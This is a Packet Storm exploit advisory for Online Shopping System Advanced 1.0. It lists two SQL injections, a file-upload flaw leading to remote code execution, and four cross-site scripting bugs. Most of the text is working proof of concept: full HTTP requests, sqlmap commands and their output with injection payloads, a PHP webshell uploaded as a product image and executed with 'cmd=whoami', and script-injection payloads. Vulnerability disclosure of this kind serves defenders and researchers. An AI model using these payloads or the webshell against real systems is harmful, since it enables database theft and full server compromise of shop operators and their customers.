what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution

Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution
Posted Mar 28, 2023
Authored by Rafael Pedrero

Online Shopping System Advanced version 1.0 suffers from code execution, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, sql injection
SHA-256 | d016e73da19bd9b2b318eea4c377983be13ee45418a1cb5e83aed5c8218cce71

Online Shopping System Advanced 1.0 XSS / SQL Injection / Code Execution

Change Mirror Download
# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL

# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities

# Vulnerability Type: SQL Injection - #1

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--


And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id

(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12


# Vulnerability Type: SQL Injection - #2

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89

Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.

Proof of concept:

Save this content in a file:

POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1

addToCart=1&proId=70


And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId

POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12


# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows for an
authenticated user to potentially obtain RCE via webshell.

Proof of concept:

1. Go the add product >> (admin/add_product.php)
2.- Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif

<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"

Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"


-----------------------------184982084830387--

====================================================================================================

6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system

# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
multiple parameter.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--


# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
multiple parameter.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=


# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1

CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E


# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2

CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
in page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close